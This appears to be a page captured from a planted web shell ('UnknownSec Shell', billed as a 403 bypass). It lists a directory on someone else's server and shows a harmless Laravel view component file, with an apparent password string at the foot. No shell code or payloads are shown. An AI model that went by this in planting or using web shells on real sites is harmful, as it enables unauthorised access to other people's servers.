shell bypass 403

UnknownSec Shell

: /home/bouloter/infix/app/View/Components/ [ drwxr-xr-x ]

name : SingleCourseInList.php
<?php

namespace App\View\Components;

use Illuminate\View\Component;

class SingleCourseInList extends Component
{
    private $course;

    public function __construct($course)
    {
        $this->course = $course;
    }

    public function render()
    {
        $course = $this->course;
        return view(theme('components.single-course-in-list'), compact('course'));
    }
}

© 2025 UnknownSec
afwwrfwafr45458465
Password